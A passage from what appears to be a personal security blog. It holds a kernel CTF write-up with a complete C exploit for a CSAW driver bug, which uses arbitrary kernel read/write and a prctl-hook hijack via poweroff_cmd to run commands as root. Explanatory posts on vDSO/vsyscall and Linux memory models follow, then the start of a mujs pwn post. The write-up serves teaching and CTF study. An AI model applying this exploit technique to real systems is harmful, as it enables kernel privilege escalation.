The driver therefore provides a limited arbitrary write through CSAW_WRITE_CHANNEL

Arbitrary read and write

CSAW_SEEK_CHANNEL and CSAW_READ_CHANNEL together give a limited arbitrary read:

item_seek->data = channel_from.user_ptr;

item_read = using_list->item;
data_read = (unsigned __int64)item_read->data;
copy_to_user(channel_from.user_ptr, &item_read->buf[data_read], channel_from.size)

item_seek and item_read both point to using_list->item (which is allocated by alloc_new_ipc_channel)
Therefore data_read == channel_from.user_ptr

The template is as follows:

void RAA(int fd, int channel_id, void *read_buff, uint64_t addr, uint32_t len)
{
    struct seek_channel_args seek_channel;
    struct read_channel_args read_channel;

    seek_channel.id = channel_id;
    seek_channel.index = addr-0x10;
    seek_channel.whence = SEEK_SET;
    ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

    read_channel.id = channel_id;
    read_channel.buf = (char*)read_buff;
    read_channel.count = len;
    ioctl(fd, CSAW_READ_CHANNEL, &read_channel);
}

CSAW_SEEK_CHANNEL and CSAW_WRITE_CHANNEL together give a limited arbitrary write:

item_seek->data = channel_from.user_ptr;

data_write = (unsigned __int64)item_write->data;
addr = (unsigned __int64)&item_write->buf[data_write];
strncpy_from_user(addr, channel_from.user_ptr, channel_from.size)

First, data_write == channel_from.user_ptr
item_write->buf, however, is allocated by _kmalloc. In theory it is hard for us to leak a heap address, but realloc_ipc_channel offers a way around this:

buf = (char *)krealloc(channel->buf, size + 1, 0x14000C0LL);
if ( buf )
{
    item->buf = buf; 
    ......
}

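When size+1 == 0, krealloc frees the old buffer and returns ZERO_SIZE_PTR (the constant 0x10) rather than a heap pointer. That value passes the if ( buf ) check and is stored in using_list->item->buf, so the heap address no longer matters; this is also why the templates use addr-0x10 as the index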
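
The arithmetic behind the bug can be checked in user space. The sketch below only models the two computations quoted from the decompiled driver, assuming the size fields are 64-bit unsigned integers; shrunk_size and access_allowed are illustrative names, not functions from the driver.

```c
#include <stdint.h>

/* Model of the shrink path: the driver computes size - user_size with
 * no check, so the result wraps around when user_size > size. */
uint64_t shrunk_size(uint64_t size, uint64_t user_size)
{
    return size - user_size;
}

/* Model of the later bounds check: an access is rejected only if
 * data + count > size. */
int access_allowed(uint64_t data, uint64_t count, uint64_t size)
{
    return !(data + count > size);
}
```

For a channel of 0x100 bytes shrunk by 0x101, shrunk_size returns 0xffffffffffffffff, so the size + 1 passed to krealloc is 0, and afterwards access_allowed accepts offsets that reach deep into kernel address space.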

The template is as follows:

void WAA(int fd, int channel_id, void* write_buff, uint64_t addr, uint32_t len)
{
    struct seek_channel_args seek_channel;
    struct write_channel_args write_channel;
	
    seek_channel.id = channel_id;
    seek_channel.index = addr-0x10;
    seek_channel.whence = SEEK_SET;
    ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

    write_channel.id = channel_id;
    write_channel.buf = (char*)write_buff;
    write_channel.count = len;
    ioctl(fd, CSAW_WRITE_CHANNEL, &write_channel);  
}

Exploitation approach

HijackPrctl can be used to obtain the flag without escalating privileges

The core of HijackPrctl is the prctl system call:

SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3,
		unsigned long, arg4, unsigned long, arg5)
{
	struct task_struct *me = current;
	unsigned char comm[sizeof(me->comm)];
	long error;

	error = security_task_prctl(option, arg2, arg3, arg4, arg5);
	if (error != -ENOSYS)
		return error;
    ......
}

Next, follow security_task_prctl

int security_task_prctl(int option, unsigned long arg2, unsigned long arg3,
			 unsigned long arg4, unsigned long arg5)
{
	int thisrc;
	int rc = -ENOSYS;
	struct security_hook_list *hp;

	hlist_for_each_entry(hp, &security_hook_heads.task_prctl, list) {
		thisrc = hp->hook.task_prctl(option, arg2, arg3, arg4, arg5);
		if (thisrc != -ENOSYS) {
			rc = thisrc;
			if (thisrc != 0)
				break;
		}
	}
	return rc;
}

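security_task_prctl walks a table of hook function pointers and calls each entry, and the first argument is under our control
If we hijack an entry in that table and then call prctl, we get arbitrary code execution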
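
The effect of overwriting one hook pointer can be modelled in user space. The sketch below replaces the kernel's hlist with a plain array and uses made-up names (hook_table, benign_hook, attacker_target, model_security_task_prctl), so it illustrates the control flow only and is not kernel code.

```c
#define MODEL_ENOSYS 38   /* numeric value of ENOSYS on Linux */

typedef int (*prctl_hook_t)(int option, unsigned long arg2, unsigned long arg3,
                            unsigned long arg4, unsigned long arg5);

int last_option = -1;     /* records what the hijacked call received */

/* Stand-in for a legitimate hook that does not handle the option. */
int benign_hook(int option, unsigned long arg2, unsigned long arg3,
                unsigned long arg4, unsigned long arg5)
{
    (void)option; (void)arg2; (void)arg3; (void)arg4; (void)arg5;
    return -MODEL_ENOSYS;
}

/* Stand-in for the function an attacker redirects the hook to. */
int attacker_target(int option, unsigned long arg2, unsigned long arg3,
                    unsigned long arg4, unsigned long arg5)
{
    (void)arg2; (void)arg3; (void)arg4; (void)arg5;
    last_option = option;
    return 0;
}

/* Writable hook table, standing in for security_hook_heads.task_prctl. */
prctl_hook_t hook_table[] = { benign_hook };

/* Same control flow as security_task_prctl, over the array above. */
int model_security_task_prctl(int option, unsigned long arg2, unsigned long arg3,
                              unsigned long arg4, unsigned long arg5)
{
    int rc = -MODEL_ENOSYS;
    unsigned int i;

    for (i = 0; i < sizeof(hook_table) / sizeof(hook_table[0]); i++) {
        int thisrc = hook_table[i](option, arg2, arg3, arg4, arg5);
        if (thisrc != -MODEL_ENOSYS) {
            rc = thisrc;
            if (thisrc != 0)
                break;
        }
    }
    return rc;
}
```

After hook_table[0] = attacker_target, the same call to model_security_task_prctl runs attacker_target with the caller's option value, which is the situation the arbitrary write creates inside the kernel.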

The WAA primitive built from the driver bug can easily overwrite this entry, but there is a problem:

int security_task_prctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5)

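The first parameter of security_task_prctl is of type int
To execute commit_creds(prepare_kernel_cred(0)), we would have to pass in the pointer returned by prepare_kernel_cred(0), but on a 64-bit system that pointer is truncated by the int type (a 32-bit system does not have this problem)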
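
The truncation is easy to demonstrate. This sketch assumes the value travels through a 32-bit register move, as the later disassembly (mov edi,r14d) suggests, so only the low 32 bits survive; through_int_param is an illustrative name.

```c
#include <stdint.h>

/* Model of a 64-bit value forced through a 32-bit parameter: only the low
 * 32 bits reach the callee, the upper half is lost. */
uint64_t through_int_param(uint64_t value)
{
    return (uint64_t)(uint32_t)value;
}
```

A pointer such as 0xffff888012345678 arrives as 0x12345678, which no longer refers to the cred structure, so commit_creds cannot be called this way.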

The function __orderly_poweroff is used instead:

static int __orderly_poweroff(bool force)
{
	int ret;

	ret = run_cmd(poweroff_cmd);

	if (ret && force) {
		pr_warn("Failed to start orderly shutdown: forcing the issue\n");
		emergency_sync();
		kernel_power_off();
	}

	return ret;
}

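This function calls run_cmd, which in turn calls call_usermodehelper (a kernel API for running a user-space program with root privileges; if we can trigger it in a controlled way, we can run any program we like as root)
The argument poweroff_cmd is a global variable and can be modified

The overall steps of HijackPrctl are therefore:

Overwrite poweroff_cmd with the command we want to run
Overwrite prctl_hook with orderly_poweroff (the exp below uses poweroff_work_func, which calls __orderly_poweroff)
Call prctl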

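For this we first need to leak kernel_base:

Once we have the RAA arbitrary read, we can brute-force the location of the VDSO's ELF header
Then, because the VDSO lies close to kernel_base (at a fixed distance for a given kernel build), we can derive the kernel base address

A template found online only needs a few changes: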

for(addr=0xffffffff80000000; addr<0xffffffffffffefff; addr+=0x1000) {
    RAA(fd, channel_id, &read_buff, addr, 8);
    if (read_buff == 0x010102464c457f) { /* signature of the VDSO ELF header */
        printf("find it: %p\n",addr);
        vdso_addr = addr;
        break;
    }
}
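
The constant 0x010102464c457f is simply the first bytes of a 64-bit little-endian ELF header read as one integer. A small sketch (helper names are illustrative) makes the correspondence explicit:

```c
#include <stdint.h>
#include <string.h>

/* Return 1 if the bytes at `p` look like the start of a 64-bit,
 * little-endian ELF header: magic, ELFCLASS64, ELFDATA2LSB, EV_CURRENT. */
int looks_like_elf64(const unsigned char *p)
{
    static const unsigned char ident[7] = { 0x7f, 'E', 'L', 'F', 2, 1, 1 };

    return memcmp(p, ident, sizeof(ident)) == 0;
}

/* Interpret 8 bytes as a little-endian integer, independent of the
 * endianness of the machine running this code. */
uint64_t le64(const unsigned char *p)
{
    uint64_t v = 0;
    int i;

    for (i = 7; i >= 0; i--)
        v = (v << 8) | p[i];
    return v;
}
```

For the byte sequence 7f 45 4c 46 02 01 01 00, le64 returns 0x00010102464c457f, the value the scan loop compares against.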

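What follows is mostly routine, but the information-gathering step deserves some care

Gathering information

First disable kaslr and start debugging the kernel: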

/ # cat /proc/kallsyms
0000000000000000 A irq_stack_union 
0000000000000000 A __per_cpu_start
ffffffffa3a00000 T startup_64
ffffffffa3a00000 T _stext
ffffffffa3a00000 T _text
ffffffffa3a00030 T secondary_startup

kernel_base == 0xffffffffa3a00000

/ # grep security_task_prctl /proc/kallsyms
ffffffffa3cbd410 T security_task_prctl
/ # grep poweroff_work_func /proc/kallsyms
ffffffffa3a9c4c0 t poweroff_work_func

poweroff_work_func == 0xffffffffa3a9c4c0
poweroff_work_func_offset = 0xffffffffa3a9c4c0 - 0xffffffffa3a00000 = 0x9c4c0

Then attach GDB and disassemble security_task_prctl at ffffffffa3cbd410

pwndbg> x /30iw 0xffffffffa3cbd410
   0xffffffffa3cbd410:	push   r15
   0xffffffffa3cbd412:	mov    r15d,0xffffffda
   0xffffffffa3cbd418:	push   r14
   0xffffffffa3cbd41a:	mov    r14d,edi
   0xffffffffa3cbd41d:	push   r13
   0xffffffffa3cbd41f:	mov    r13,rsi
   0xffffffffa3cbd422:	push   r12
   0xffffffffa3cbd424:	mov    r12,rdx
   0xffffffffa3cbd427:	push   rbp
   0xffffffffa3cbd428:	mov    rbp,rcx
   0xffffffffa3cbd42b:	push   rbx
   0xffffffffa3cbd42c:	sub    rsp,0x8
   0xffffffffa3cbd430:	mov    rbx,QWORD PTR [rip+0x14a4cc9]        # 0xffffffffa5162100
   0xffffffffa3cbd437:	mov    QWORD PTR [rsp],r8
   0xffffffffa3cbd43b:	cmp    rbx,0xffffffffa5162100
   0xffffffffa3cbd442:	je     0xffffffffa3cbd46f
   0xffffffffa3cbd444:	mov    r8,QWORD PTR [rsp]
   0xffffffffa3cbd448:	mov    rcx,rbp
   0xffffffffa3cbd44b:	mov    rdx,r12
   0xffffffffa3cbd44e:	mov    rsi,r13
   0xffffffffa3cbd451:	mov    edi,r14d
   0xffffffffa3cbd454:	call   QWORD PTR [rbx+0x18] /* target */

Set a breakpoint at 0xffffffffa3cbd454 and run until it is hit:

*RBX  0xffffffffa4c4fce8 —▸ 0xffffffffa5162100 ◂— 0xffffffffa4c4fce8
*RIP  0xffffffffa3cbd454 ◂— call   qword ptr [rbx + 0x18]
─────────────────────────────────────────────
 ► 0xffffffffa3cbd454    call   qword ptr [rbx + 0x18]        <0xffffffffa3a9c4c0>

prctl_hook == 0xffffffffa4c4fd00
prctl_hook_offset = 0xffffffffa4c4fd00 - 0xffffffffa3a00000 = 0x124fd00

Then, still in GDB, disassemble poweroff_work_func at ffffffffa3a9c4c0

pwndbg> x /30iw 0xffffffffa3a9c4c0
   0xffffffffa3a9c4c0:	push   rbx
   0xffffffffa3a9c4c1:	mov    rdi,0xffffffffa4c3d1e0
   0xffffffffa3a9c4c8:	movzx  ebx,BYTE PTR [rip+0x1670401]        # 0xffffffffa510c8d0
   0xffffffffa3a9c4cf:	call   0xffffffffa3a9c050 /* calls run_cmd */

The first call is the call to run_cmd, so its first argument, held in rdi, is poweroff_cmd
poweroff_cmd_offset = 0xffffffffa4c3d1e0 - 0xffffffffa3a00000 = 0x123d1e0
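
The three offsets are plain subtractions from the kernel base seen in this debugging session, and they are added back to whatever base is leaked at exploit time. A minimal sketch with illustrative helper names:

```c
#include <stdint.h>

/* Offset of a symbol from the kernel base observed in one boot. */
uint64_t sym_offset(uint64_t sym_addr, uint64_t kernel_base)
{
    return sym_addr - kernel_base;
}

/* Address of the same symbol in another boot, given that boot's base. */
uint64_t rebase(uint64_t new_base, uint64_t offset)
{
    return new_base + offset;
}
```

For example, sym_offset(0xffffffffa4c4fd00, 0xffffffffa3a00000) gives 0x124fd00 for prctl_hook, and rebase applies that offset to the base recovered through the VDSO scan.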

Full exp:

#include<stdio.h>
#include<stdlib.h>
#include<inttypes.h>
#include<sys/types.h>
#include<fcntl.h>
#include<sys/ioctl.h>
#include<sys/prctl.h>
#include<unistd.h>
#include<sys/auxv.h>
#include<string.h>
#include<stdbool.h>

#define CSAW_IOCTL_BASE     0x77617363
#define CSAW_ALLOC_CHANNEL  CSAW_IOCTL_BASE+1
#define CSAW_OPEN_CHANNEL   CSAW_IOCTL_BASE+2
#define CSAW_GROW_CHANNEL   CSAW_IOCTL_BASE+3
#define CSAW_SHRINK_CHANNEL CSAW_IOCTL_BASE+4
#define CSAW_READ_CHANNEL   CSAW_IOCTL_BASE+5
#define CSAW_WRITE_CHANNEL  CSAW_IOCTL_BASE+6
#define CSAW_SEEK_CHANNEL   CSAW_IOCTL_BASE+7
#define CSAW_CLOSE_CHANNEL  CSAW_IOCTL_BASE+8

void error(const char* msg)
{
    perror(msg);
    exit(-1); 
}

struct alloc_channel_args {
    size_t buf_size;
    int id;
};

struct open_channel_args {
    int id;
};

struct grow_channel_args {
    int id;
    size_t size;
};

struct shrink_channel_args {
    int id;
    size_t size;
};

struct read_channel_args {
    int id;
    char *buf;
    size_t count;
};

struct write_channel_args {
    int id;
    char *buf;
    size_t count;
};

struct seek_channel_args {
    int id;
    loff_t index;
    int whence;
};

struct close_channel_args {
    int id;
};

void RAA(int fd, int channel_id, void *read_buff, uint64_t addr, uint32_t len)
{
    struct seek_channel_args seek_channel;
    struct read_channel_args read_channel;

    seek_channel.id = channel_id;
    seek_channel.index = addr-0x10;
    seek_channel.whence = SEEK_SET;
    ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

    read_channel.id = channel_id;
    read_channel.buf = (char*)read_buff;
    read_channel.count = len;
    ioctl(fd, CSAW_READ_CHANNEL, &read_channel);
}

void WAA(int fd, int channel_id, void* write_buff, uint64_t addr, uint32_t len)
{
    struct seek_channel_args seek_channel;
    struct write_channel_args write_channel;

    seek_channel.id = channel_id;
    seek_channel.index = addr-0x10;
    seek_channel.whence = SEEK_SET;
    ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

    write_channel.id = channel_id;
    write_channel.buf = (char*)write_buff;
    write_channel.count = len;
    ioctl(fd, CSAW_WRITE_CHANNEL, &write_channel);  
}

int main()
{
    int fd, channel_id;
    struct alloc_channel_args alloc_channel;
    struct shrink_channel_args shrink_channel;
    uint64_t addr;
    uint32_t result;
    uint64_t read_buff = 0;
    uint32_t i;
    uint64_t vdso_addr = 0;

    setbuf(stdout ,0);

    fd = open("/proc/simp1e", O_NONBLOCK);
    if(fd == -1)
        error("open dev error");

    alloc_channel.buf_size = 0x100;
    alloc_channel.id = -1;
    ioctl(fd, CSAW_ALLOC_CHANNEL, &alloc_channel);

    if(alloc_channel.id == -1 )
        error("alloc channel error");
    else
        printf("channel id: %d\n",alloc_channel.id);

    channel_id = alloc_channel.id;

    shrink_channel.id = channel_id;
    shrink_channel.size = 0x100 + 1;
    ioctl(fd, CSAW_SHRINK_CHANNEL, &shrink_channel);

    for(addr=0xffffffff80000000; addr<0xffffffffffffefff; addr+=0x1000) {
        RAA(fd, channel_id, &read_buff, addr, 8);
        if (read_buff == 0x010102464c457f) {
            printf("find it: %p\n",addr);
            vdso_addr = addr;
            break;
        }
    }

    if(vdso_addr==0)
        error("can't find vdso_base");

    uint64_t kernel_base = vdso_addr - 0x1020000;
    printf("[+] kernel base addr: 0x%lx\n", kernel_base);

    uint64_t poweroff_work_func_offset = 0x9c4c0; 
    uint64_t poweroff_cmd_offset = 0x123d1e0;
    uint64_t prctl_hook_offset = 0x124fd00;
    uint64_t poweroff_work_func_addr = kernel_base + poweroff_work_func_offset;
    uint64_t poweroff_cmd_addr = kernel_base + poweroff_cmd_offset;
    uint64_t task_prctl_hook_addr = kernel_base + prctl_hook_offset;

    char arbitrary_command[] = "/bin/chmod 777 /flag";
    WAA(fd, channel_id, arbitrary_command, poweroff_cmd_addr, strlen(arbitrary_command));
    WAA(fd, channel_id, &poweroff_work_func_addr, task_prctl_hook_addr, 8);

    prctl(0 ,2, 0, 0,2);
    printf("flag: ");
    system("cat flag");

    return 0;
}

Summary:

This was my first encounter with HijackPrctl; the final exp draws on the approach of raycp

Linux vdso&vsyscall

Posted on 2022-10-03 In Knowledge 3.2k 3 mins.

Background

Debug any ELF file with GDB and run the vmmap command, and you will find them:

    0x7ffff7fc9000     0x7ffff7fcd000 r--p     4000 0      [vvar]
    0x7ffff7fcd000     0x7ffff7fcf000 r-xp     2000 0      [vdso]
    0x7ffff7fcf000     0x7ffff7fd0000 r--p     1000 0      /usr/lib/x86_64-linux-gnu/ld-2.31.so
    0x7ffff7fd0000     0x7ffff7ff3000 r-xp    23000 1000   /usr/lib/x86_64-linux-gnu/ld-2.31.so
    0x7ffff7ff3000     0x7ffff7ffb000 r--p     8000 24000  /usr/lib/x86_64-linux-gnu/ld-2.31.so
    0x7ffff7ffc000     0x7ffff7ffd000 r--p     1000 2c000  /usr/lib/x86_64-linux-gnu/ld-2.31.so
    0x7ffff7ffd000     0x7ffff7ffe000 rw-p     1000 2d000  /usr/lib/x86_64-linux-gnu/ld-2.31.so
    0x7ffff7ffe000     0x7ffff7fff000 rw-p     1000 0      [anon_7ffff7ffe]
    0x7ffffffde000     0x7ffffffff000 rw-p    21000 0      [stack]
0xffffffffff600000 0xffffffffff601000 --xp     1000 0      [vsyscall]

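vsyscall: the first and oldest mechanism for speeding up system calls
- It provides a way to execute certain system calls quickly from user space
- The Linux kernel maps a memory page into user space that contains some variables and the implementations of some system calls, and specific system calls are replaced with function calls (no switch to kernel mode is needed)
vdso (virtual dynamic shared object): vdso is the replacement for vsyscall
- The vsyscall area is too small and is mapped at a fixed address, which is a security problem (vsyscall still exists for compatibility)
- vdso is really a dynamic library provided by the kernel and mapped into the address space of every process; it offers function calls that take the place of system calls
- In essence, vdso is a piece of kernel-provided code mapped into user space so that those system calls can be made faster
vvar: the place where data is stored; the functions in vdso use the data in vvar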

vsyscall

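Intel was the first to implement a dedicated fast system call instruction, sysenter, with the matching return instruction sysexit
AMD responded with its own pair of dedicated fast system call instructions, syscall and the return instruction sysret

The core of the vsyscall mechanism is that calling __kernel_vsyscall decides whether the syscall/sysret or the sysenter/sysexit instructions should be executed

The vsyscall page is a special page that lies in the kernel address space yet is the only region there that user code may access. Its address is fixed at 0xffffffffff600000 (on 64-bit systems) and its size is fixed at 4K (all processes share the kernel mapping)
__kernel_vsyscall belongs to kernel data, and a user-space program can obtain its address only through the ELF auxiliary vector (specifically AT_SYSINFO)
After finding AT_SYSINFO in the ELF auxiliary vector, the program writes the system call number and arguments into registers as for a traditional system call and calls the __kernel_vsyscall function (which decides whether to execute syscall or sysenter)

vsyscall can also replace specific system calls with function calls. The following code can be found at /usr/include/asm/vsyscall.h on Linux: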

/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
#ifndef _ASM_X86_VSYSCALL_H
#define _ASM_X86_VSYSCALL_H

enum vsyscall_num {
	__NR_vgettimeofday, 
	__NR_vtime,
	__NR_vgetcpu,
};

#define VSYSCALL_ADDR (-10UL << 20)

#endif /* _ASM_X86_VSYSCALL_H */
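
The VSYSCALL_ADDR expression evaluates to the fixed address of the [vsyscall] mapping shown by vmmap. The sketch below repeats the computation with a fixed-width type, so the result does not depend on how wide unsigned long is on the machine compiling it:

```c
#include <stdint.h>

/* Same expression as VSYSCALL_ADDR (-10UL << 20), written with a 64-bit
 * type: -10 is 0xfffffffffffffff6, shifted left by 20 bits. */
uint64_t vsyscall_addr(void)
{
    return (uint64_t)-10 << 20;
}
```

The result is 0xffffffffff600000, which lies 10 MiB below the top of the 64-bit address space.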

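The vsyscall mechanism supports three system calls:

gettimeofday(): returns the time packed in a structure, including seconds, microseconds, time zone, and other information
time(): returns the current system time as a large integer
getcpu(): returns CPU information

These functions share one property: the root user and ordinary users get the same result (so there is no security concern)

A shared memory region is set up between the kernel and user space, and the kernel periodically “pushes” the latest values into it
When a user-space program calls one of these system calls, the library function does not actually perform a system call; it reads the latest value through the vsyscall page (the one we saw in GDB)
Turning the system call into a function call directly improves performance (it removes the kernel entry overhead)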

vdso

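vdso is the replacement for vsyscall. They differ as follows:

vdso is essentially an ELF shared object, whereas vsyscall is just a region of code and data in memory
vsyscall lies in the kernel address space and uses a static address mapping, whereas vdso, thanks to the PIC property that shared objects naturally have, can be mapped dynamically into each process's address space

The vdso is easy to find with the ldd command: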

➜  exp ldd /bin/sh
	linux-vdso.so.1 (0x00007ffe04dee000) # target
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f70dd181000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f70dd3ad000)

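The vdso mapping itself is an ELF shared object
Its source lives in the Linux kernel tree under /arch/x86/entry/vdso
It consists of a small amount of assembly code, some C source files, and a linker script

vdso can likewise stand in for system calls. The relevant code is as follows (in the vdso.lds.S file under the path above):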

/*
 * This controls what userland symbols we export from the vDSO.
 */
VERSION {
	LINUX_2.6 {
	global:
		clock_gettime;
		__vdso_clock_gettime;
		gettimeofday;
		__vdso_gettimeofday;
		getcpu;
		__vdso_getcpu;
		time;
		__vdso_time;
	local: *;
	};

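The vdso mechanism supports four system calls:

gettimeofday(): returns the time packed in a structure, including seconds, microseconds, time zone, and other information
time(): returns the current system time as a large integer
getcpu(): returns CPU information
clock_gettime(): returns the time of a given clock with nanosecond resolution

Its implementation differs from that of vsyscall:

When a program is loaded, the dynamic linker and loader load the dynamically linked objects the program depends on, including vdso
When glibc parses the ELF headers, it stores some location information about vdso, and it includes short stub functions that look up symbol names in vdso before a real system call is made
The code in glibc searches vdso for the corresponding function and returns its address. The code that does the real work is packaged in vdso rather than in the kernel, so no system call is needed
The kernel information that vdso needs is provided by the vvar mapping, and the address of vdso itself is passed through the ELF auxiliary vector (specifically AT_SYSINFO_EHDR)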
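
A process can look up its own vdso through the auxiliary vector. The following minimal sketch uses glibc's getauxval with AT_SYSINFO_EHDR and checks for the ELF magic at the returned address; the two helper names are made up for illustration.

```c
#include <string.h>
#include <sys/auxv.h>

/* Return the address of the vDSO image in this process, or NULL if the
 * kernel did not provide AT_SYSINFO_EHDR. */
const unsigned char *vdso_base(void)
{
    return (const unsigned char *)getauxval(AT_SYSINFO_EHDR);
}

/* Return 1 if the mapping at `base` starts with the ELF magic. */
int vdso_has_elf_magic(const unsigned char *base)
{
    return base != NULL && memcmp(base, "\177ELF", 4) == 0;
}
```

On a typical Linux system vdso_base() returns the start of the [vdso] region shown by vmmap, and the image there begins with the same ELF header the kernel-side scan looks for.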


A Brief Analysis of Linux Memory Models

Posted on 2022-10-02 In Knowledge 2.6k 2 mins.

memory model

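The Linux kernel supports three memory models:

flat memory model
discontiguous memory model
sparse memory model

A memory model describes how physical memory is laid out as seen from the CPU, and it determines how the Linux kernel manages that physical memory (some architectures support several memory models, but only one can be selected when the kernel is built)

Program segmentation and CPU memory segmentation are different concepts

In include/asm-generic/memory_model.h, Linux provides the following macro definitions for every memory model: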

#define page_to_pfn __page_to_pfn /* virtual memory -> physical memory */
#define pfn_to_page __pfn_to_page /* physical memory -> virtual memory */

They associate a struct page in virtual memory with the page frame that the physical memory is divided into

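Flat memory model

The flat memory model is defined in contrast to the multi-segment model

In 8086 real mode, the CPU's 16-bit registers can address at most the 64 KB of a single memory segment; to go beyond 64 KB it first has to change the segment base in order to fetch from farther away
The flat model has only one segment from start to finish, so it can access the memory space directly without changing the segment base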

#define __pfn_to_page(pfn)	(mem_map + ((pfn) - ARCH_PFN_OFFSET))
#define __page_to_pfn(page)	((unsigned long)((page) - mem_map) + \
				 ARCH_PFN_OFFSET)

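For the flat memory model, physical memory itself is contiguous
If it were not contiguous, part of the physical address range in the middle would have no physical memory behind it and would form holes, which wastes the memory occupied by the mem_map array itself

Its characteristics are:

Memory is contiguous and has no gaps
Typically used on UMA (uniform memory access) systems
Configured with CONFIG_FLATMEM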
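
The flat-model macros are plain array indexing, which a user-space model makes easy to see. In this sketch struct page is a one-field stand-in, and MODEL_PFN_OFFSET and MODEL_NR_PAGES are hypothetical values chosen for illustration rather than taken from any real architecture.

```c
#include <stddef.h>

struct page { unsigned long flags; };      /* stand-in for the kernel's struct page */

#define MODEL_PFN_OFFSET 0x100UL            /* hypothetical ARCH_PFN_OFFSET */
#define MODEL_NR_PAGES   16

static struct page mem_map[MODEL_NR_PAGES]; /* one entry per page frame */

/* pfn -> struct page: index into the single global array. */
struct page *model_pfn_to_page(unsigned long pfn)
{
    return mem_map + (pfn - MODEL_PFN_OFFSET);
}

/* struct page -> pfn: pointer difference plus the first valid pfn. */
unsigned long model_page_to_pfn(const struct page *page)
{
    return (unsigned long)(page - mem_map) + MODEL_PFN_OFFSET;
}
```

Because every pfn between the first and the last needs an array slot, a hole in physical memory still costs mem_map entries, which is the waste described above.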

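Discontiguous memory model

If the address space has holes and is not contiguous when the CPU accesses physical memory, the memory model of that system is the discontiguous memory model

The discontiguous memory model was designed for NUMA (non-uniform memory access) systems
In a NUMA system each CPU has its own local memory. A CPU reaches its local memory without going over the bus, so access is much faster; each CPU together with its memory is called a NUMA node
Each node in NUMA is represented by a pglist_data structure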

#define __pfn_to_page(pfn)			\
({	unsigned long __pfn = (pfn);		\
	unsigned long __nid = arch_pfn_to_nid(__pfn);  \
	NODE_DATA(__nid)->node_mem_map + arch_local_page_offset(__pfn, __nid);\
})

#define __page_to_pfn(pg)						\
({	const struct page *__pg = (pg);					\
	struct pglist_data *__pgdat = NODE_DATA(page_to_nid(__pg));	\
	(unsigned long)(__pg - __pgdat->node_mem_map) +			\
	 __pgdat->node_start_pfn;					\
})

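Because each CPU has its own local memory, physical memory inevitably has some holes

Its characteristics are:

Multiple memory nodes that are not contiguous and have gaps between them
Suitable for both UMA and NUMA systems
Configured with CONFIG_DISCONTIGMEM

With the introduction of the sparse memory model, this memory model has gradually been abandoned (ARM removed support for the discontiguous memory model in 2010)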

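Sparse memory model

The sparse memory model was proposed to address the shortcomings of the discontiguous memory model

The contiguous address space is divided into sections, and every section can be hot-plugged, so the memory address space can be split more finely and more scattered, non-contiguous memory can be supported
The managed physical memory consists of mem_section units of a fixed, architecture-defined size, so physical memory as a whole can be viewed as an array of mem_section entries, each of which contains a pointer that indirectly refers to an array of pages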

#define __page_to_pfn(pg)					\
({	const struct page *__pg = (pg);				\
	int __sec = page_to_section(__pg);			\
	(unsigned long)(__pg - __section_mem_map_addr(__nr_to_section(__sec)));	\
})

#define __pfn_to_page(pfn)				\
({	unsigned long __pfn = (pfn);			\
	struct mem_section *__sec = __pfn_to_section(__pfn);	\
	__section_mem_map_addr(__sec) + __pfn;		\
})

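Its characteristics are:

Multiple memory regions that are not contiguous and have gaps between them
Online and hot-plug memory is managed in units of sections
Supports memory hot-plug; in its classic form its performance is slightly below that of DISCONTIGMEM
On x86 and ARM64 this model is used (typically in its SPARSEMEM_VMEMMAP variant), where it outperforms DISCONTIGMEM and is comparable to FLATMEM
It is the default memory model on ARM64
Configured with CONFIG_SPARSEMEM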
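
The sparse lookup adds the full pfn to a per-section pointer without subtracting the section's first pfn, because that subtraction is folded into the stored pointer in advance. The user-space sketch below models this with an integer-encoded pointer; the section size, the number of sections, and all names are hypothetical, and pfns are assumed to fall inside the section table.

```c
#include <stddef.h>
#include <stdint.h>

struct page { unsigned long flags; };    /* stand-in for struct page */

#define MODEL_SECTION_SHIFT 4             /* hypothetical: 16 pages per section */
#define MODEL_NR_SECTIONS   8

struct model_section {
    uintptr_t biased_map;   /* page array address minus start_pfn entries; 0 = absent */
};

static struct model_section sections[MODEL_NR_SECTIONS];

/* Register the page array that backs section `nr`. */
void model_section_init(unsigned long nr, struct page *map)
{
    unsigned long start_pfn = nr << MODEL_SECTION_SHIFT;

    sections[nr].biased_map = (uintptr_t)map - start_pfn * sizeof(struct page);
}

/* pfn -> struct page: pick the section, then add the full pfn. */
struct page *model_pfn_to_page(unsigned long pfn)
{
    struct model_section *sec = &sections[pfn >> MODEL_SECTION_SHIFT];

    if (sec->biased_map == 0)
        return NULL;        /* hole: no memory behind this section */
    return (struct page *)(sec->biased_map + pfn * sizeof(struct page));
}
```

Only sections that are actually present need a page array, so holes cost one small table entry each instead of a run of unused struct page slots.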

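Memory model support by platform

Architecture	FLATMEM	DISCONTIGMEM	SPARSEMEM
ARM	Default	Not supported	Optional on some systems
ARM64	Not supported	Not supported	Default
x86_32	Default	Not supported	Configurable
x86_32(NUMA)	Not supported	Default	Configurable
x86_64	Not supported	Not supported	Default
x86_64(NUMA)	Not supported	Not supported	Default

Reference: Linux memory model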

JavaScript pwn + type confusion

Posted on 2022-10-01 In Reappearance 15k 14 mins.

Reproducing mujs

A kind of pwn I had not encountered before

GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.3) stable release version 2.31

Based on the challenge information, first find out what mujs is

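MuJS overview

MuJS is a lightweight JavaScript interpreter designed to be embedded in other software to provide script execution. It is written in portable C and implements the ECMAScript standard as defined by ECMA-262

MuJS includes a simple executable, mujs, which calls the MuJS library to provide a standard JavaScript interpreter that serves as an interactive JavaScript console or a batch command execution platform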

➜  release ./mujs
Welcome to MuJS 1.2.0.
>

After starting the mujs interpreter, you can type in JavaScript code

mujs: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /home/yhellow/tools/glibc-all-in-one/libs/2.31-0ubuntu9.9_amd64/ld-2.31.so, for GNU/Linux 3.2.0, BuildID[sha1]=27979cb2ff1c7a6765b5243c3aaad6c609e88108, stripped
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    FORTIFY:  Enabled

